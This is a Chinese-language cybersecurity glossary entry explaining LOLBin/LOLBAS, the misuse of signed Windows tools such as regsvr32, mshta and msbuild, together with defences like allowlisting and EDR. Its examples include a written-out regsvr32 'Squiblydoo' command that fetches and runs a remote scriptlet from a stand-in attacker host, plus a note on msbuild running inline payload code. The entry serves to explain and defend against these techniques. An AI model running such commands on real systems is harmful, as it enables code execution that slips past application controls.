LOLBin / LOLBAS
LOLBin / LOLBAS 是什么?
LOLBin / LOLBAS被攻击者滥用、外表仍是合法管理工具的已签名原生二进制或脚本(LOLBin/LOLBAS),可用于执行、下载、持久化或绕过防护。
LOLBin(Living-Off-the-Land Binary)及其更广义的项目 LOLBAS(Living-Off-the-Land Binaries And Scripts)收录了具备攻击者可利用副作用的微软签名二进制、脚本和库,例如执行任意代码、下载远程载荷或绕过应用程序控制。常见示例包括 rundll32.exe、regsvr32.exe、mshta.exe、msbuild.exe、installutil.exe 和 certutil.exe。由于这些工具均已签名并被默认信任,防御者无法简单按哈希封禁,必须区分正常和异常的命令行。LOLBAS 支撑了 MITRE ATT&CK 中大量执行与防御绕过技术。缓解措施依赖应用程序白名单、ScriptBlock 与进程创建日志、ASR 规则以及 EDR 行为分析。
● 示例
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll(Squiblydoo)。
- 02
msbuild.exe payload.xml,在不落地 EXE 的情况下执行内联 C# 代码。
● 常见问题
LOLBin / LOLBAS 是什么?
被攻击者滥用、外表仍是合法管理工具的已签名原生二进制或脚本(LOLBin/LOLBAS),可用于执行、下载、持久化或绕过防护。 它属于网络安全的 攻击与威胁 分类。
LOLBin / LOLBAS 是什么意思?
被攻击者滥用、外表仍是合法管理工具的已签名原生二进制或脚本(LOLBin/LOLBAS),可用于执行、下载、持久化或绕过防护。
LOLBin / LOLBAS 是如何工作的?
LOLBin(Living-Off-the-Land Binary)及其更广义的项目 LOLBAS(Living-Off-the-Land Binaries And Scripts)收录了具备攻击者可利用副作用的微软签名二进制、脚本和库,例如执行任意代码、下载远程载荷或绕过应用程序控制。常见示例包括 rundll32.exe、regsvr32.exe、mshta.exe、msbuild.exe、installutil.exe 和 certutil.exe。由于这些工具均已签名并被默认信任,防御者无法简单按哈希封禁,必须区分正常和异常的命令行。LOLBAS 支撑了 MITRE ATT&CK 中大量执行与防御绕过技术。缓解措施依赖应用程序白名单、ScriptBlock 与进程创建日志、ASR 规则以及 EDR 行为分析。
如何防御 LOLBin / LOLBAS?
针对 LOLBin / LOLBAS 的防御通常结合技术控制与运营实践,详见上方完整定义。
LOLBin / LOLBAS 还有哪些其他名称?
常见的别称包括: LOLBAS, Living-off-the-Land 二进制。
● 相关术语
- attacks№ 616
就地取材攻击
攻击者不投放自有恶意软件,而是滥用受害系统中已存在的合法工具和脚本完成攻击的战术风格。
- malware№ 417
无文件恶意软件
主要在内存中运行、利用受信任的系统工具,尽量避免在磁盘上留下传统可执行文件的恶意软件。
- defense-ops№ 298
防御规避
MITRE ATT&CK 战术 TA0005,涵盖攻击者用来规避检测、禁用安全工具并隐藏自身活动的各种技术。
- defense-ops№ 371
EDR(端点检测与响应)
持续记录端点进程、文件、注册表与网络活动,以检测、调查并响应主机层威胁的端点安全技术。
- defense-ops№ 682
Mimikatz
开源 Windows 后渗透工具,从内存和 LSASS 中提取明文密码、哈希、Kerberos 票据等凭据。
- attacks№ 045
AMSI 绕过
禁用、修补或规避 Windows AMSI(反恶意软件扫描接口)的一类技术,使脚本和内存载荷不被杀毒引擎扫描。